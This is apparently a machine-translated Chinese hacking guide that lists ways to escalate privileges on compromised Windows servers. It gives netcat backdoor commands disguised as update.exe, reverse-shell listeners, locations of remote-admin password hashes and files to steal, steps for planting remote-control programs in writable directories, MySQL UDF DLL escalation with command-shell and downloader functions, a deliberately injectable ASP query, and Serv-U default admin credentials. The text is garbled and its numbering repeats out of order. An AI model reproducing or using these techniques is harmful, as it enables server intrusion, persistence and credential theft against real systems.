More effective methods for Elevation of Privilege are reproduced and updated continuously.

No.10VncVnc is widely used by many foreigners. It is rarely used in China, but the probability is high. VNC vulnerability HKEY_LOCAL_MACHINE \ SYSTEM \ RAdmin \ v2.0 \ Server \ Parameters \ Parameter default password registry location HKEY_LOCAL_MACHINE \ SYSTEM \ RAdmin \ v2.0 \ Server \ Parameters \ Port default end

No. 10 VNc
Vnc is widely used by many foreigners. It is rarely used in China, but the chances are high.
====================
VNC Vulnerability

HKEY_LOCAL_MACHINE \ SYSTEM \ RAdmin \ v2.0 \ Server \ Parameters \ Parameter // default password registry location
HKEY_LOCAL_MACHINE \ SYSTEM \ RAdmin \ v2.0 \ Server \ Parameters \ Port // default Port registry location

In the past, we could use the functions provided by asp Trojans to read key values and convert them to get hash values. But now we have something more convenient to upload ASP files to the server, open the hash and Radmin service ports that can be directly read from Radmin!
 

No. 8 PcAnywhere
PcAnywhere is a widely used remote management software that saves the CIF File Password of the remote administrator account and can be easily decrypted, if we get the WEBSEHLL of a host. We found that the directory on which PCANYWHERE is installed and the password file is saved is to allow our IUSER permission to access. We can download this CIF file to a local hacker, and then log on to the server from the local machine through PCANYWHERE. The idea is simple and clear.
Ps: the CIF file for saving the password. It is not located in the installation directory of PCANYWHERE and is located in \ Documents and Settings \ All Users \ Appli of the disk where PCANYWHERE is installedCatIon Data \ Symantec \ pcAnywhere \ If PCANYWHERE is installed under the D: \ program \ file, the PCANYWHERE password file is saved in D: \ Documents ents and Settings \ All Users \ Application Data \ Symantec \ pcAnywhere \ folder.

No. 7 sogou Input Method
Many management systems use five-stroke typing. However, a few prefer pinyin, which has fewer smart ABC functions and does not have full spelling functions. Therefore, most of them choose sogou input methods.
The root directory of the sogou input method is PinyinUp.ExE is used to update the dictionary. To save the dictionary, the Administrator may install the sogou Input Method on the D Drive. The default directory of the sogou input method is Everyone readable and writable, directly bind the remote control and wait for the next restart to go online.

No. 6 WinWebMail enterprise Post Office System 7i24.com
The everyone permission must be set for the web in the WinWebMail directory to be readable and writable, or the email cannot be logged in. Therefore, find the WinWebMail shortcut in the Start Program and check the path, access path \ web pass shell. After accessing the shell, the permission is system. Put remote control into the startup Item and wait for the next restart. The user is added directly without the cmd component.
The 7i24 web directory is also writable and the permission is adminisTrAtor.

No. 5 NC Rebound
Nc instance

C: \ nc.exe-l-p 4455-d-e cmd.exe can hide a NetCat backdoor.
C: \ nc.exe-p 4455-d-L-e cmd.exeCommandThe hacker can use netcatto re-return the system and go to the System Manager to check that nc.exe is running in the task manager. This backdoor can be further concealed.
C: \ move nc.exe c: \ windows \ system32 \ Drivers \ upDate. Exe
C: \ windows \ systeme32 \ drivers \ update.exe-p 4455-d-L-e cmd.exe
System Administrators can attach privileges to malicious programs, such as update.exe. Hackers can also hide command lines.
C: \ windows \ me32 \ drivers \ update.exe
Cmd line:-l-p 4455-d-L-e cmd.exe

C: \>
Nc-l-p 80 listens to port 80
Nc-l-p 80> c: \ log. dat listens to port 80 and records the information to log. dat.
Nc-v-l-p 80 listens to port 80 and displays port information
Nc-vv-l-p 80 listens to port 80 and displays more detailed port information
Nc-l-p 80-t-e listen .exelistener information of port 80, at the same time, redirect cmd.exe to port 80, when someone is connected, let

Cmd.exe uses teLnResponse in the form of et. Of course, it is best to use it on controlled bots.
Nc-v ip port scan a port of an IP address
Nc-v-z ip port-port Scan port of an IP address to a port
Nc-v-z-u ip port-port scan a UDP port of an IP address to a UDP port

 

No. 4 mssql (sa) mysql (root), asp Trojan comes with connection to execute build
If sa 1433 is disabled, an injection point can be built. (I have not tried constructing --#)
<%
StrSQLServerName = "Server ip"
StrSQLDBUserName = "database account"
StrSQLDBPassword = "Database Password"
StrSQLDBName = "database name"
Set conn = Server. createObject ("ADODB. Connection ")
StrCon = "ProvIdEr = SQLOLEDB.1; Persist Security Info = FaLsE; Server = "& strSQLServerName &"; User ID = "& strSQLDBUserName &"; Password = "& strSQLDBPassword &"; Database = "& strSQLDBName &";"
Conn. open strCon
Dim rs, strSQL, id
SetRs = server. createobject ("ADODB. recordset ")
Id = request ("id ")
StrSQL = "select * from ACTLIST where worldid =" & idrs. open strSQL, conn, 1, 3
Rs. close

No. 7RootSu.PHPCooperation with uDf. Dll Elevation of Privilege (the effect is obvious! The one you wrote when you made a detour.PhpIf the udf is root and supports external hehe ..)
Step 1: Upload the PHP file to the target machine and enter your MYSQL account to connect.
Step 2: After the connection is successful, export the DLL file. Do not pay attention to the export path during export (generally any directory can be written, so you do not need to consider permission issues ).
For MySQL or later versions, you must export the DLL to the system directory of the target machine (win or system32); otherwise, you will see "No paths allow" in the next step.EdFor shared library "error.
Step 3: use SQL statements to create functions. Syntax: Create Function Name (the Function name can only be one of the following lists) returns string soname 'export DLL path ';
For MySQL or later versions, the DLL in the statement cannot contain full paths. If you have exported the DLL to the system directory in step 2, you can omit the path and run the command normally, otherwise, you will see the "Can't open shared library" error.
In this case, you must re-export the DLL to the system directory.
Step 4: After correctly creating function functions, you can use these functions using SQL statements. Syntax: the name of the function created by the select statement ('parameter list'). Each function has different parameters. You can use the name of the function created by the select statement ('help '); to obtain the parameter list of the specified function.
Udf. dll function description:
Cmdshell executes cmd;
Downloader downloads the specified file online and saves it to the specified directory;
Open3389 General Open 3389 terminal service, you can specify the port (no need to restart without changing the port );
Backshell rebound Shell;
& Nb
Sp; ProcessView enumerate system processes;
KillProcess: terminates a specified process;
Regread read the registry;
RegWriteWrite the registry;
Shut down shut, log off, and restart;
About description and help functions;
 

No. 3 03 Oday (easy to use)
03 run cmd to execute the command.
Usage: "command"

If aspx is supported, the execution probability is relatively high, and NC bounce is low. You can also try execute mongoshell.

No. 2 Serv-u (this Elevation of Privilege depends on the specific situation of the version ..)
The vulnerability is caused by the use of the Serv-u local default Management port. The default Administrator logs on to the new domain and the user to execute commands. Serv-u> 3. in Version x, the default Local Management port is 43958, the default Administrator is LocalAdministrator, and the default password is:# L @ $ ak #. lk; 0 @ PThis is integrated in Serv-u. You can use the Guest permission to connect and manage Serv-u.

No. 3 thunder Elevation of Privilege

Replace service!

If creation is not supported, rename or delete it? Is it Intranet? If you can execute the command, net net1. .. disable but cannot add users, and cannot open 3389 ,... There are many problems!

Proxy sniffing, god, and rootkit are all good. Recently, I like brute-force cracking .. Unexpected gains are quite fruitful.